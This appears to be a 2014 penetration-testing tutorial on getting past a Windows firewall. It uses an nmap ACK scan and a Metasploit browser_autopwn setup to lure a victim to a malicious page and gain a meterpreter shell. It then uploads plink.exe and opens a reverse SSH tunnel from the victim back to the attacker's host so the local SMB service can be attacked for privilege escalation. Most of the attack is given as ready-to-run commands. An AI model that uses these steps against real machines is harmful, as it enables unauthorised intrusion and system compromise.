Picture_Firewallmetasploit

 

 

A lot of times  the victim machine may have windows firewall turned on thus making exploitation of vulnerable services on the victim tough. In this tutorial, we will look at how to workaround this restriction.

 

The attacker lures the victim to view his malicious webpage which is a riddled with a browser exploit. Once the victim gets compromised, the attacker notices that we still only has privileges of the local user.

Using this tunnel and port forwarding we going to compromises the SMB service running on the victim which has privileges of the Local System. Once his privileges are escalated we can enable to access the meterpreter fom his system.

 

Below is the example image of all port filtered by windows firewall.

 

Screenshot from 2014-06-28 22_27_48

 

NMAP TCP ACK Scan (-sA)

 

It is always good to send the ACK packets rather than the SYN packets because if there is any active firewall working on the remote computer then because of the ACK packets the firewall cannot create the log, since firewalls treat ACK packet as the response of the SYN packet. The TCP ACK scan requires the root privileges at the attacker side and it performs very well for the stateless firewall and IDS. As a penetration tester you need to check the response of a firewall; there might be four types of responses:

 

 

Open port (few ports in the case of the firewall)

Closed port (most ports are closed because of the firewall)

Filtered (Nmap is not sure whether the port is open or not)

Unfiltered (Nmap can access the port but is still confused about the open status of the port)

 

So these are some important responses that you might get during a penetration testing. ACK scan is slightly different from the other types of scanning techniques because it has not been designed to discover the open ports, but it has an ability to determine the filtered and unfiltered responses.

 

 

So we need to check the target for enabled firewall by using Nmap scan.

 

#nmap -sA 192.168.31.2

 

Screenshot from 2014-06-29 15:36:53

 

From the result, clearly show that is firewall is enabled and it block all the incoming connections from others and no clue that which port is opened.

 

 

So now it is very easy to find out whether the target computer has a firewall enabled or not, since a simple ACK scan means there is a lower chance of detection at the victim side but a high chance for the attacker to discover the firewall

 

 

So we going to use server/browser_autopwn module,This module uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them.

 

After successful attack it creates Meterpreter session, so you can gain local access to target.

 

#msfconsole

 

#msf > use server/browser_autopwn

 

#msf auxiliary(browser_autopwn) > set LHOST 192.168.31.20

 

#msf auxiliary(browser_autopwn) > set SRVHOST 192.168.31.20

 

#msf auxiliary(browser_autopwn) > set SRVPORT 8080

 

#msf auxiliary(browser_autopwn) > set URIPATH /

 

#msf auxiliary(browser_autopwn) > exploit

 

Screenshot from 2014-06-29 15:58:37Screenshot from 2014-06-29 16:00:53

 

After successful exploit we get a meterpreter session, from the merterpreter enter to the shell of the victim.

 

#meterpreter > shell

 

C:> netstat -an

 

Screenshot from 2014-06-29 16:57:39

 

It will show all the listening connection in the victim’s  machine.

 

 

Now we going to upload plink.exe from our host to victims machine. now needs to escalate his privilege by exploiting a system program or service. To accomplish this we creates an SSH tunnel through the firewall to his machine.

 

#meterpreter > upload /home/sathish/Downloads/plink.exe “C:\\Users\\Public”

#meterpreter > shell

C: >  cd c:\users\public

C: > plink.exe -l root -pw bhuvi -R 445:127.0.0.1:445 192.168.31.20

 

Screenshot from 2014-06-29 17:05:22

 

Plink (PuTTY Link) is a command-line connection tool similar to UNIX ssh. It is mostly used for automated operations and SSH shell connection.this will creates an SSH tunnel through the firewall from the victims machine to our host.

 

Using this tunnel and port forwarding we compromises the SMB service running on the victim which has privileges of the Local System.

 

Screenshot from 2014-06-29 17:18:56

 

After getting ssh into our host machine we can do whatever from our host machine address 127.0.0.1, without considering about firewall and elevate the privileges.